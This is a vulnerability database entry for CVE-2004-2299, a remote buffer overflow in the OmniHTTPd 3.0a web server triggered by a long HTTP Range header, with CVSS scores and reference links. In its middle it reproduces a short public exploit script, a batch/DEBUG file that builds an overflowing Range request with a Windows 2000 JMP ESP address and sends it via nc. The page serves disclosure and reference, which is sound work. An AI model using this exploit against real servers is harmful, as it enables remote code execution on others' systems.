CVE-2004-2299
CVSS 7.5
Published: 2004-12-31 00:00:00
Last modified: 2013-09-08 00:31:34

[Original] Buffer overflow in Omnicron OmniHTTPd 3.0a and earlier allows remote attackers to execute arbitrary code via an HTTP GET request with a long Range header.


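[CNNVD] Omnicron OmniHTTPD GET Request Buffer Overflow Vulnerability (CNNVD-200412-232)

        A buffer overflow vulnerability exists in Omnicron OmniHTTPd 3.0a and earlier. Remote attackers can execute arbitrary code via an HTTP GET request with an overly long Range header.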

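- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interruption of resource access]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is currently unavailable

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2299
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2299
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-232
(Official data source) CNNVD

- Other Links and Resources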

http://xforce.iss.net/xforce/xfdb/16190
(VENDOR_ADVISORY)  XF  omnithttpd-range-header-bo(16190)
http://www.securityfocus.com/bid/10376
(UNKNOWN)  BID  10376
http://www.securityfocus.com/archive/1/363651
(UNKNOWN)  BUGTRAQ  20040518 Overflow@OmniHTTPd
http://www.osvdb.org/12944
(UNKNOWN)  OSVDB  12944

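- Vulnerability Information

Omnicron OmniHTTPD GET Request Buffer Overflow Vulnerability
High risk  Buffer overflow
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        A buffer overflow vulnerability exists in Omnicron OmniHTTPd 3.0a and earlier. Remote attackers can execute arbitrary code via an HTTP GET request with an overly long Range header.

- Advisories and Patches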

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability Information (24129)

Omnicron OmniHTTPD 2.x/3.0 Get Request Buffer Overflow Vulnerability (EDBID:24129)
windows remote
2004-04-23 Verified
0 CoolICE
N/A
source: http://www.securityfocus.com/bid/10376/info

Reportedly OmniHTTPD is affected by a GET request buffer overflow vulnerability. This issue is due to a failure of the application to properly validate string sizes when processing user input.

This issue could allow an attacker to execute arbitrary code with the privileges of the affected web server.

@echo off
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:   OmniHTTPd
:Vendors:       http://www.omnicron.ca
:Version:       <=V3.0a
:Platforms:     Windows
:Bug:           Overflow
:Date:          2004-04-23
:Author:        CoolICE
:E-mail:        CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;if '%1'=='' echo Usage:%0 target&&goto :eof
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Range: "
!Overflow@length>0xE0
f 117 206 41
!JMPESP@w2k
e 207 12 45 FA 7F
!Shellcode
rcx
1FC
nhttp.tmp
w
q


:run
nc %1 80 < http.tmp
del http.tmp		

- Vulnerability Information

12944
OmniHTTPd Get Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability Description

Unknown or Incomplete

- Timeline

2004-05-18 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete